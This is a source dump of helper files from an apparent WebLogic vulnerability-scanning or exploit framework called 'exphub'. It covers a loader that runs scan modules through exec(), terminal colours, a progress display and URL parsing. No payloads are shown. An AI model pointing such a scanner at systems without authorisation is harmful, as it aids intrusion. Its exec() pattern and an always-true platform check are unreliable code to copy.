ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.weblogic.{0} import {1}".format(defclass, defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("WeblogicScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/weblogic/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.weblogic.WeblogicScan import WeblogicScan -------------------------------------------------------------------------------- /lib/Color.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 10:57 9 | @File: Color.py 10 | @Desc: 颜色模板 11 | ''' 12 | 13 | import platform 14 | 15 | #linux 16 | if "Darwin" or "Linux" in platform.system(): 17 | class Vcolors: 18 | HEADER = '\033[95m' 19 | OKBLUE = '\033[94m' 20 | OKGREEN = '\033[92m' 21 | WARNING = '\033[93m' 22 | FAIL = '\033[91m' 23 | RED = '\033[31m' 24 | ENDC = '\033[0m' 25 | BOLD = '\033[1m' 26 | UNDERLINE = '\033[4m' 27 | YELLOW= '\033[1;33m' 28 | DARKGRAY= "\033[1;30m" 29 | CYAN= "\033[0;36m" 30 | PURPLE= "\033[0;35m" 31 | BROWN= "\033[0;33m" 32 | WHITE= "\033[1;37m" 33 | #其他情况 34 | else: 35 | class Vcolors: 36 | HEADER = '' 37 | OKBLUE = '' 38 | OKGREEN = '' 39 | WARNING = '' 40 | FAIL = '' 41 | RED = '' 42 | ENDC = '' 43 | BOLD = '' 44 | UNDERLINE = '' 45 | YELLOW= '' 46 | DARKGRAY= "" 47 | CYAN= "" 48 | PURPLE= "" 49 | BROWN= "" 50 | WHITE= "" -------------------------------------------------------------------------------- /lib/ModelLoad.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:11 9 | @File: ModelLoad.py 10 | @Desc: 11 | ''' 12 | import sys 13 | import time 14 | from lib import * 15 | import logging 16 | 17 | 18 | class ONLoad: 19 | try: 20 | def __init__(self,name: str): 21 | self.name = name 22 | j=1 23 | for i in name: 24 | prompt = Vcolors.OKBLUE + "[+] 加载中: " + Vcolors.ENDC + (Vcolors.RED+ "模块{}->{}" +Vcolors.ENDC).format(j,i) 25 | j += 1 26 | sys.stdout.write("\r" + prompt) 27 | time.sleep(0.2) 28 | sys.stdout.flush() 29 | sys.stdout.write(Vcolors.OKGREEN +"\r" + "[*] ---------------加载结束---------------" + Vcolors.ENDC) 30 | sys.stdout.flush() 31 | liststr="" 32 | for s in name: 33 | liststr +="\t<->\t\b\b{}\n".format(s) 34 | print(Vcolors.PURPLE + "\n" + liststr.strip("\n") + Vcolors.ENDC) 35 | print(Vcolors.OKBLUE + "[*] ---------------开始测试---------------" + Vcolors.ENDC) 36 | #load1=["\\","/","一"] 37 | #for t in range(10000): 38 | # for q in load1: 39 | # prompt = Vcolors.OKBLUE + "[+] 测试中: " + q + Vcolors.ENDC 40 | # sys.stdout.write("\r" + prompt) 41 | # time.sleep(0.2) 42 | # sys.stdout.flush() 43 | except: 44 | logging.error("ModelLoad.py文件运行异常") -------------------------------------------------------------------------------- /lib/Urldeal.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 17:17 9 | @File: Urldeal.py 10 | @Desc: URl处理,分割 11 | ''' 12 | import urllib.parse 13 | #处理URL 14 | def urldeal(url): 15 | if url.startswith("http"): 16 | res = urllib.parse.urlparse(url) 17 | else: 18 | res = urllib.parse.urlparse('http://%s' % url) 19 | return res.scheme, res.hostname, res.port 20 | 21 | def umethod(Url): 22 | scheme, url, port = urldeal(Url) 23 | if port is None and scheme == 'https': 24 | port = 443 25 | elif port is None and scheme == 'http': 26 | port = 80 27 | else: 28 | port = port 29 | return scheme, url, port -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 1 | from lib.Color import Vcolors 2 | from lib.Urldeal import urldeal --------------------------------------------------------------------------------